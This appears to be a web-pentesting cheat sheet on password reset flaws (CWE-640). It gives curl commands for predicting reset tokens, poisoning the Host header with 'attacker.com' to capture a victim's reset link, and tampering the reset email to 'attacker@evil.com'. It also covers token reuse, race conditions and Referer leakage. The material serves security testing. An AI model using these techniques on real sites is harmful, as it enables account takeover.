Password Reset Exploitation


CWE	CWE-640
Tools	burp, jwt_tool
Difficulty	🟡 intermediate

Exploit Password Reset Flaws

Predict Reset Tokens

# Request multiple password reset tokens and analyze patterns
for i in {1..5}; do
    curl -X POST "https://TARGET/forgot-password" \
        -d "email=test${i}@test.com"
    sleep 1
done

# Analyze reset URLs/tokens for:
# - Timestamp-based tokens
# - Sequential tokens
# - User ID embedded in token
# - Weak hash (e.g., MD5 of email + timestamp)

Poison the Host Header

# Poison the Host header so the reset link points to an attacker-controlled domain
curl -X POST "https://TARGET/forgot-password" \
    -H "Host: attacker.com" \
    -d "email=victim@target.com"

# If the reset email uses the Host header to construct the reset URL,
# the victim clicks a link to attacker.com leaking the reset token

Check Token Leakage via Referer

Reset links contain tokens in the URL. If the reset page loads external resources (images, scripts, analytics), the token leaks via the Referer header. Check the password reset page for third-party resource loads.

Manipulate the Reset Flow

# Parameter tampering -- change the email during password reset submission
curl -X POST "https://TARGET/reset-password" \
    -d "token=valid_token&password=newpass&email=attacker@evil.com"

# Token reuse -- after a successful reset, try the same token again

# Race condition -- request reset, then login quickly before reset invalidates old password

Exploit Password Reset Flaws​

Predict Reset Tokens​

Poison the Host Header​

Check Token Leakage via Referer​

Manipulate the Reset Flow​

Exploit Password Reset Flaws

Predict Reset Tokens

Poison the Host Header

Check Token Leakage via Referer

Manipulate the Reset Flow